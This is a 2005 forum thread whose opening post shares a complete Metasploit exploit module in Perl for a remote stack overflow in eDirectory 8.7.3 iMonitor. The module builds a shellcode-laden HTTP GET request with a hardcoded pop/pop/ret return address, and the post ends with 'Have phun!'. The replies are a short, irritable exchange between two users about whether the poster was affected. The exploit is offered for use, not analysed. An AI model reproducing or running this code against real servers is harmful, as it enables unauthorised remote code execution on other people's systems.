machinamedia 0 Report post Posted August 21, 2005 Here's the advisory: http://imp.ovh.net/fr/ package Msf::Exploit::edirectory_imonitor;use strict;use base "Msf::Exploit";use Pex::Text;my $advanced = { };my $info ={'Name' => 'eDirectory 8.7.3 iMonitor Remote Stack Overflow','Version' => '$Revision: 1.1 $','Authors' =>['Anonymous',],'Arch' => [ 'x86' ],'OS' => [ 'win32', 'winxp', 'win2k', 'win2003' ],'Priv' => 1,'AutoOpts' =>{'EXITFUNC' => 'thread'},'UserOpts' =>{'RHOST' => [1, 'ADDR', 'The target address'],'RPORT' => [1, 'PORT', 'The target port', 8008 ],'VHOST' => [0, 'DATA', 'The virtual host name of the server'],'SSL' => [0, 'BOOL', 'Use SSL'],},'Payload' =>{'Space' => 0x1036,'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\$%",'Keys' => ['+ws2ord'],},'Description' => Pex::Text::Freeform(qq{This module exploits a stack overflow in eDirectory 8.7.3 iMonitorservice.}),'Refs' =>[['BID', 14548],],'Targets' =>[[ 'Windows (all versions) - eDirectory 8.7.3 iMonitor', 0x63501f15] # pop/pop/ret],'Keys' => ['imonitor'],};sub new {my $class = shift;my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);return($self);}sub Exploit {my $self = shift;my $target_host = $self->GetVar('RHOST');my $target_port = $self->GetVar('RPORT');my $target_idx = $self->GetVar('TARGET');my $shellcode = $self->GetVar('EncodedPayload')->Payload;my $target = $self->Targets->[$target_idx];$self->PrintLine( "[*] Attempting to exploit " . $target->[0] );my $s = Msf::Socket::Tcp->new('PeerAddr' => $target_host,'PeerPort' => $target_port,'SSL' => $self->GetVar('SSL'),);if ( $s->IsError ) {$self->PrintLine( '[*] Error creating socket: ' . $s->GetError );return;}# pop/pop/ret in ndsimon.dlm on our jump to our shellcodemy $req = $shellcode . "\x90\x90\xeb\x04" . pack('V', $target->[1]) ."\xe9\xbd\xef\xff\xff" . ("B" x 0xD0);my $request ="GET /nds/$req HTTP/1.1\r\n"."Accept: */*\r\n"."User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"."Host: $target_host:$target_port\r\n"."Connection: Close\r\n"."\r\n";$s->Send($request);$self->PrintLine("[*] Overflow request sent, sleeping for four seconds");select(undef, undef, undef, 4);$self->Handler($s);return;}1; Have phun! Share this post Link to post Share on other sites
melkonianarg 0 Report post Posted August 22, 2005 Ooooo, nasty...hope that has not caused you any problems... Share this post Link to post Share on other sites
machinamedia 0 Report post Posted August 23, 2005 Ooooo, nasty...hope that has not caused you any problems... 177297[/snapback] What exactly do you mean? Share this post Link to post Share on other sites
melkonianarg 0 Report post Posted August 23, 2005 Well, do you run one of these servers? Have you been remotely accessed through a network? Does this security threat have any relevance to you? Share this post Link to post Share on other sites
machinamedia 0 Report post Posted August 23, 2005 Well, do you run one of these servers? Have you been remotely accessed through a network? Does this security threat have any relevance to you? 177522[/snapback] I thought you were saing that the post caused me problems... That's it! Sorry if you feel so irritated by a simple question and you answer on that sarcastic tone. Next time better don't answer... It's same! Share this post Link to post Share on other sites
